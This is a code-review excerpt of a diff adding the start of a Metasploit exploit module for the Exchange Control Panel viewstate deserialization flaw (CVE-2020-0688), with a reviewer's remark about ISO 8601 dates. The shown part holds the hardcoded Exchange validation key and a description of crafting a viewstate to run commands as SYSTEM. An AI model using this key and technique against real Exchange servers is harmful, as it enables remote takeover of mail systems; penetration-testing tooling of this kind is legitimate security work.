modules/exploits/windows/http/exchange_ecp_viewstate.rb

```diff
@@ -0,0 +1,365 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'bindata'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  # include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'
+  VALIDATION_KEY = "\xcb\x27\x21\xab\xda\xf8\xe9\xdc\x51\x6d\x62\x1d\x8b\x8b\xf1\x3a\x2c\x9e\x86\x89\xa2\x53\x03\xbf"
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Exchange Control Panel Viewstate Deserialization',
+        'Description'    => %q{
+          This module exploits a .NET serialization vulnerability in the
+          Exchange Control Panel (ECP) web page. The vulnerability is due to
+          Microsoft Exchange Server not randomizing the keys on a
+          per-installation basis resulting in them using the same validationKey
+          and decryptionKey values. With knowledge of these, values an attacker
+          can craft a special viewstate to cause an OS command to be executed
+          by NT_AUTHORITY\SYSTEM using .NET deserialization.
+        },
+        'Author'         => 'Spencer McIntyre',
+        'License'        => MSF_LICENSE,
+        'References'     => [
+            ['CVE', '2020-0688'],
+            ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],
+        ],
+        'Platform'       => 'win',
+        'Targets'        =>
+          [
+            [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
+            [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
+            [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]
+          ],
+        'DefaultOptions' =>
+          {
+            'SSL' => true
+          },
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Feb 11 2020',
```

Comment:
We generally prefer ISO 8601 dates. Turns out they've been supported all along, but we never used them until recently.